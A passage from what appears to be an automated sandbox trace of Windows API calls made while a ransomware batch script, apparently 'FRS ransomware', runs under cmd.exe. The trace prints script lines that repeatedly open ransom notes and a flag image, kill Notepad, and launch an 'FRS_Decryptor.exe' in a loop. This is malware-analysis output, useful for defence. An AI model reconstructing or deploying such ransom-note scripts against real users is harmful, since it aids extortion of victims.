C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0088.939] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.939] GetFileType (hFile=0x34c) returned 0x1 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0088.939] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0088.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0088.939] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.939] GetFileType (hFile=0x34c) returned 0x1 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0088.939] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0088.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0088.939] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.939] GetFileType (hFile=0x34c) returned 0x1 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0088.939] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0088.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0088.940] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.940] GetFileType (hFile=0x34c) returned 0x1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0088.940] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0088.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0088.940] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.940] GetFileType (hFile=0x34c) returned 0x1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0088.940] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0088.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0088.940] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.940] GetFileType (hFile=0x34c) returned 0x1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0088.940] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0088.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0088.940] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.940] GetFileType (hFile=0x34c) returned 0x1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0088.940] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0088.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0088.940] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0088.941] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.941] GetFileType (hFile=0x34c) returned 0x1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0088.941] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0088.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0088.941] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.941] GetFileType (hFile=0x34c) returned 0x1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0088.941] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0088.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0088.941] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.941] GetFileType (hFile=0x34c) returned 0x1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0088.941] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0088.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0088.941] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.941] GetFileType (hFile=0x34c) returned 0x1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0088.941] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0088.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0088.941] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.941] GetFileType (hFile=0x34c) returned 0x1 [0088.941] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0088.942] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0088.942] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0088.942] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0088.942] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0088.942] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.942] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0088.942] _get_osfhandle (_FileHandle=0) returned 0x24 [0088.942] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0088.942] SetConsoleInputExeNameW () returned 0x1 [0088.942] GetConsoleOutputCP () returned 0x1b5 [0088.942] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0088.942] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.943] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x34c [0088.943] _open_osfhandle (_OSFileHandle=0x34c, _Flags=8) returned 3 [0088.943] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.943] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0088.943] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0088.943] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0088.943] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0088.943] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0088.943] GetFileType (hFile=0x34c) returned 0x1 [0088.943] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.943] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0088.943] _tell (_FileHandle=3) returned 2512 [0088.943] _close (_FileHandle=3) returned 0 [0088.943] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0088.943] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0088.943] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0088.943] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0088.943] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0088.943] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0088.943] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0088.943] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0088.943] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0088.943] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0088.943] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0088.943] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0088.943] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0088.943] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0088.943] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0088.943] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0088.943] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0088.943] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0088.943] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0088.943] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0088.943] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0088.943] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0088.943] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0088.944] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0088.944] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0088.944] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0088.944] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0088.944] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0088.944] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0088.944] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0088.944] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0088.944] _wcsicmp (_String1="ping", _String2="START") returned -3 [0088.944] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0088.944] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0088.944] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0088.944] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0088.944] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0088.944] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0088.944] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0088.944] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0088.944] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0088.944] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0088.944] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0088.944] SetErrorMode (uMode=0x0) returned 0x0 [0088.944] SetErrorMode (uMode=0x1) returned 0x0 [0088.944] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0088.944] SetErrorMode (uMode=0x0) returned 0x1 [0088.944] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0088.944] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0088.944] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0088.944] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.944] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0088.944] GetLastError () returned 0x2 [0088.944] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.944] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0088.944] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0088.944] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0088.945] GetLastError () returned 0x2 [0088.945] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0088.945] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0088.945] GetFileType (hFile=0x28) returned 0x2 [0088.945] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0088.945] _dup (_FileHandle=1) returned 3 [0088.945] _close (_FileHandle=1) returned 0 [0088.945] _wcsicmp (_String1="nul", _String2="con") returned 11 [0088.945] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0088.945] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0088.945] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0088.945] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0088.945] SetErrorMode (uMode=0x0) returned 0x0 [0088.945] SetErrorMode (uMode=0x1) returned 0x0 [0088.945] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0088.945] SetErrorMode (uMode=0x0) returned 0x1 [0088.945] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0088.945] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0088.946] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0088.946] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.946] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0088.946] GetLastError () returned 0x2 [0088.946] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.946] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0088.946] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0088.946] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0088.946] GetLastError () returned 0x2 [0088.946] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59e70 [0088.946] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0088.946] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0088.946] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0088.946] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0088.946] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0088.946] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0088.946] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0088.946] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0088.947] _wcsnicmp (_String1="COPYCMD", 